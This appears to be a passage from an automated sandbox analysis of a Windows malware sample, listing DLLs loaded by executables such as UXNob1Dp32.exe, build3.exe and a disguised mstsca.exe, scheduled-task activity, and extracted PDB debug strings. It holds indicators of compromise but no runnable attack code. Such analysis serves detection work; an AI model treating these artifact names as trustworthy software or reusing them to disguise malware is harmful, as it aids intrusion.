Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build3.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build3.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\24c79069-10a0-4140-9323-7c1741b1b662\build3.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\e099b2f4-df3e-483e-96de-f9e556584831\UXNob1Dp32.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Section loaded: uxtheme.dll

Source: C:\Users\user\Desktop\UXNob1Dp32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: UXNob1Dp32.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: WINLOA~1.PDBwinload_prod.pdb source: UXNob1Dp32.exe, 00000005.00000003.2075468192.0000000003380000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\l* source: UXNob1Dp32.exe, 00000005.00000003.2193278581.0000000003488000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2193874690.0000000003491000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2194897418.0000000003498000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: UXNob1Dp32.exe, 00000005.00000003.2121514211.00000000032F9000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2118927129.0000000003419000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2119079628.00000000034B5000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2141866780.00000000032F7000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2140711382.00000000034BD000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2140465227.0000000003440000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2142950234.00000000034D5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: UXNob1Dp32.exe, 00000005.00000003.2187900703.000000000387B000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2195602941.000000000387B000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2194961891.000000000387B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ation source: UXNob1Dp32.exe, 00000005.00000002.2203764277.00000000032E6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\gefolusopu\refugefifacek-cibecuciru.pdb source: UXNob1Dp32.exe, 00000000.00000002.1626432855.0000000000411000.00000002.00000001.01000000.00000003.sdmp, UXNob1Dp32.exe, 00000000.00000000.1621402719.0000000000411000.00000002.00000001.01000000.00000003.sdmp, UXNob1Dp32.exe, 00000001.00000000.1624079487.0000000000411000.00000002.00000001.01000000.00000003.sdmp, UXNob1Dp32.exe, 00000003.00000002.1650673211.0000000000411000.00000002.00000001.01000000.00000003.sdmp, UXNob1Dp32.exe, 00000003.00000000.1643851973.0000000000411000.00000002.00000001.01000000.00000003.sdmp, UXNob1Dp32.exe, 00000004.00000000.1645744558.0000000000411000.00000002.00000001.01000000.00000007.sdmp, UXNob1Dp32.exe, 00000004.00000002.1656657577.0000000000411000.00000002.00000001.01000000.00000007.sdmp, UXNob1Dp32.exe, 00000005.00000000.1648043653.0000000000411000.00000002.00000001.01000000.00000003.sdmp, UXNob1Dp32.exe, 00000006.00000000.1654206960.0000000000411000.00000002.00000001.01000000.00000007.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\Z source: UXNob1Dp32.exe, 00000005.00000003.2097677691.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2075468192.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2099434444.0000000003419000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098624630.0000000003418000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\W source: UXNob1Dp32.exe, 00000005.00000003.2097677691.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2075468192.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2099434444.0000000003419000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098624630.0000000003418000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: UXNob1Dp32.exe, 00000005.00000003.2182625216.0000000003795000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2174814325.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2181866623.0000000003745000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2183364884.000000000379C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\P source: UXNob1Dp32.exe, 00000005.00000003.2142833395.000000000367B000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2143136874.0000000003693000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2152891886.000000000368B000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2152955677.000000000369B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: UXNob1Dp32.exe, 00000005.00000003.2192209394.0000000003804000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2192869446.0000000003692000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2193084806.00000000036C3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: UXNob1Dp32.exe, 00000005.00000003.2097677691.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2075468192.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2099434444.0000000003419000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098624630.0000000003418000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\s\ source: UXNob1Dp32.exe, 00000005.00000003.2171028392.00000000036A3000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2170246115.000000000368B000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2152891886.000000000368B000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2152955677.000000000369B000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2170851615.0000000003692000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\U source: UXNob1Dp32.exe, 00000005.00000003.1836470979.000000000318E000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.1836548366.00000000031A3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\baduleropolec\83 roxihapuponab.pdb source: build2.exe, 00000008.00000000.1746999590.0000000000410000.00000002.00000001.01000000.00000008.sdmp, build2.exe, 00000008.00000002.1751118423.0000000000410000.00000002.00000001.01000000.00000008.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\cs\ source: UXNob1Dp32.exe, 00000005.00000003.2140465227.0000000003428000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\0 source: UXNob1Dp32.exe, 00000005.00000003.2075994382.000000000313B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\r\\l7+P8 source: UXNob1Dp32.exe, 00000005.00000003.2195346057.0000000003154000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2189453431.0000000003156000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2188598539.0000000003151000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2194516135.0000000003151000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: UXNob1Dp32.exe, 00000005.00000003.2193640577.000000000338F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error\ source: UXNob1Dp32.exe, 00000005.00000003.2075468192.0000000003418000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\we\y) source: UXNob1Dp32.exe, 00000005.00000003.2188967976.00000000033B2000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2182066894.00000000033B2000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2189516260.000000000340F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\bup-mage85\kuvovipor\soxecexar-kavah95\wibaju90_tavi60 p.pdb source: build3.exe, 0000000B.00000000.1793257120.0000000000401000.00000020.00000001.01000000.00000009.sdmp, mstsca.exe, 00000020.00000000.3617544736.0000000000401000.00000020.00000001.01000000.0000000A.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: UXNob1Dp32.exe, 00000005.00000003.2075468192.0000000003418000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\App source: UXNob1Dp32.exe, 00000005.00000003.2170203340.0000000003156000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2171630947.0000000003166000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\R source: UXNob1Dp32.exe, 00000005.00000003.2182625216.00000000037EC000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2189117308.00000000037ED000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2188768311.00000000037AC000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2187900703.0000000003785000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\[C source: UXNob1Dp32.exe, 00000005.00000003.2176697587.00000000036AA000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2176771216.00000000036D3000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2175838580.00000000036AA000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2171028392.00000000036E5000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2170246115.00000000036E5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\p\s\ source: UXNob1Dp32.exe, 00000005.00000003.2183537439.00000000036AA000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2183899817.00000000036FB000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2182163208.000000000369B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\p source: UXNob1Dp32.exe, 00000005.00000003.2097677691.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.1836470979.000000000318E000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2075833483.0000000003198000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2075468192.0000000003418000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2075658801.0000000003170000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.1836548366.00000000031A3000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2099434444.0000000003419000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2098624630.0000000003418000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: UXNob1Dp32.exe, 00000005.00000003.2176697587.00000000036AA000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2176771216.00000000036D3000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2175838580.00000000036AA000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2171028392.00000000036E5000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2170246115.00000000036E5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\@qKDX source: UXNob1Dp32.exe, 00000005.00000003.2187900703.000000000387B000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2195602941.000000000387B000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2194961891.000000000387B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\$FSS source: UXNob1Dp32.exe, 00000005.00000003.2175321525.0000000003765000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2174814325.0000000003745000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2171385752.0000000003745000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\\ source: UXNob1Dp32.exe, 00000005.00000003.2176068075.0000000003429000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2175605480.00000000033B2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\C:\U source: UXNob1Dp32.exe, 00000005.00000003.2170643885.00000000032EC000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2176027330.000000000331D000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2171552388.0000000003301000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\* source: UXNob1Dp32.exe, 00000005.00000003.2182544147.000000000344F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\a\* source: UXNob1Dp32.exe, 00000005.00000003.2141507694.0000000003440000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2151962595.000000000343D000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2151141564.000000000339B000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2153154383.0000000003481000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2140465227.0000000003440000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ing\ source: UXNob1Dp32.exe, 00000005.00000003.2143045525.0000000003394000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2140611312.0000000003378000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2120639302.0000000003364000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2141368683.0000000003390000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2121265677.000000000337C000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2119166945.000000000332D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\75\s source: UXNob1Dp32.exe, 00000005.00000003.2192209394.0000000003804000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\% source: UXNob1Dp32.exe, 00000005.00000003.2171274137.00000000036FB000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2171028392.00000000036E5000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2170246115.00000000036E5000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2152624353.00000000036CB000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2153020401.00000000036E3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\e\ source: UXNob1Dp32.exe, 00000005.00000003.2177220754.00000000032F1000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2184429600.0000000003303000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2176460771.00000000032EE000.00000004.00000020.00020000.00000000.sdmp, UXNob1Dp32.exe, 00000005.00000003.2183310542.00000000032FD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.errorogFile_October_3_2023__13_9_20.txt source: UXNob1Dp32.exe, 00000005.00000003.2075468192.0000000003380000.00000004.00000020.00020000.00000000.sdmp
